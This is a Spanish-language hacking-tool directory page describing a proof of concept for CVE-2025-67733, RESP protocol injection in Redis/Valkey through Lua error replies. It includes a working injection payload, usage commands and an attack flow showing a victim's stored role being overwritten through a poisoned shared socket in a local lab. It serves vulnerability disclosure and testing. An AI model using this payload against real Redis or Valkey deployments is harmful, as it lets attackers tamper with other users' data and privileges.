Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-67733 — PoC de inyección RESP en Redis/Valkey (CVE-2025-67733) | Kitploit
Herramientas/GitHubGitHub/jylab/cve-2025-67733
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubjylab/cve-2025-67733

CVE-2025-67733

PoC de inyección RESP en Redis/Valkey (CVE-2025-67733)

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de inyección de protocolo RESP

Prueba de concepto que demuestra la vulnerabilidad de inyección de protocolo RESP mediante mensajes de error de scripts Lua en Valkey/Redis.

Archivos

backend.py

Backend Flask que simula una aplicación web con conexión Valkey compartida (pool de conexiones).

Endpoints:

Descargar herramienta
MétodoEndpointDescripción
POST/api/user/roleEstablecer rol de usuario
GET/api/user/roleObtener rol de usuario
POST/api/processEjecutar script Lua

Uso:

root@kitploit:~
python backend.py <Valkey host> <Valkey port> [password]

# Examples
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 mypassword

attacker_client.py

Inyecta datos RESP maliciosos en el búfer del socket mediante un mensaje de error de script Lua.

Carga útil:

root@kitploit:~
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))

Uso:

root@kitploit:~
python attacker_client.py

victim_client.py

Cliente legítimo que establece y recupera roles de usuario.

Uso:

root@kitploit:~
python victim_client.py set    # Set role to "normal_user"
python victim_client.py get    # Get current role

Demostración del ataque

Requisitos previos

root@kitploit:~
pip install flask requests

Pasos

Terminal 1 - Iniciar backend:

root@kitploit:~
python backend.py 127.0.0.1 6379

Terminal 2 - Establecer rol:

root@kitploit:~
python victim_client.py set
# Output: 'role':'normal_user' has been set.

python victim_client.py get
# Output: 'role':'normal_user'

Terminal 3 - Atacar:

root@kitploit:~
python attacker_client.py
# Output: Socket poisoning successful

Terminal 2 - Obtener rol (después del ataque):

root@kitploit:~
python victim_client.py get
# Output: 'role':'hacked_user'

Flujo del ataque

root@kitploit:~
1. Victim sets role
   victim_client.py set --> backend --> Valkey
                                        SET user:user:role "normal_user"

2. Attacker injects payload
   attacker_client.py --> backend --> Valkey
                                      EVAL 'error(...)' 0

   Backend reads: "-ERR INJECTED\r\n"
   Buffer remains: "$11\r\nhacked_user"

3. Victim gets role
   victim_client.py get --> backend --> Valkey
                                        GET user:user:role

   Backend reads from buffer: "$11\r\nhacked_user"
   Victim receives: "hacked_user"